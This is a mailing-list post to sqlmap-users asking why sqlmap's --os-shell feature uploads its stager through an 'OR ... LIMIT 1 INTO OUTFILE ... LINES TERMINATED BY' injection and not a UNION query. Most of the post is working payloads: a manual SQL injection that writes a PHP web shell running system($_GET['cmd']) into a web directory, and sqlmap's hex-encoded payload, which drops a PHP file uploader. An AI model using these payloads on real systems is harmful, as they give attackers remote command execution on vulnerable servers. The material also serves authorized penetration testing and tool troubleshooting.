While using sqlmap with --os-shell I found that it only works if the
writable directory is on the DOCUMENT_ROOT directly
and if it exists on another dir sqlmap successfully uploads the php file
but it couldn't connect through it
Looks like it's cuz of the union garbage if so why does sqlmap sends the
query like this
-7440' OR 6498=6498 LIMIT 1 INTO OUTFILE instead or trying the union
statement ?
Here's data I sent manually to the application
' UNION ALL SELECT "<?php system($_GET['cmd']); ?>",NULL,NULL,NULL INTO
OUTFILE "/opt/lampp/htdocs/uploads/test.php"#
and here's sqlmap payload:
-7440' OR 6498=6498 LIMIT 1 INTO OUTFILE 's/scope/sqli/tmpuywdg.php' LINES
TERMINATED BY
0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d2929207b0a20202020246469723d245f524551554553545b2275706c6f6164446972225d3b0a0a202020206966202870687076657273696f6e2829203c2027342e312e3027290a202020207b0a20202020202020202466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b0a2020202020202020406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c2024646972202e20222f22202e202466696c6529206f722064696528293b0a202020207d0a20202020656c73650a202020207b0a20202020202020202466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b0a2020202020202020406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c2024646972202e20222f22202e202466696c6529206f722064696528293b0a202020207d0a202020204063686d6f642824646972202e20222f22202e202466696c652c2030373535293b0a202020206563686f202246696c652075706c6f61646564223b0a7d0a656c7365207b0a202020206563686f20223c666f726d20616374696f6e3d22202e20245f5345525645525b225048505f53454c46225d202e2022206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d732f73636f70652f73716c693e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b0a7d0a3f3e0a
--
Also LINES TERMINATED BY worked for me
Thanks in advance
--
- Ahmed Shawky El-Antry
- lnxg33k owner "http://lnxg33k.wordpress.com";
- Isecur1ty team member"http://www.isecur1ty.org";
- Twitter @lnxg33k
------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and
threat landscape has changed and how IT managers can respond. Discussions
will include endpoint security, mobile security and the latest in malware
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
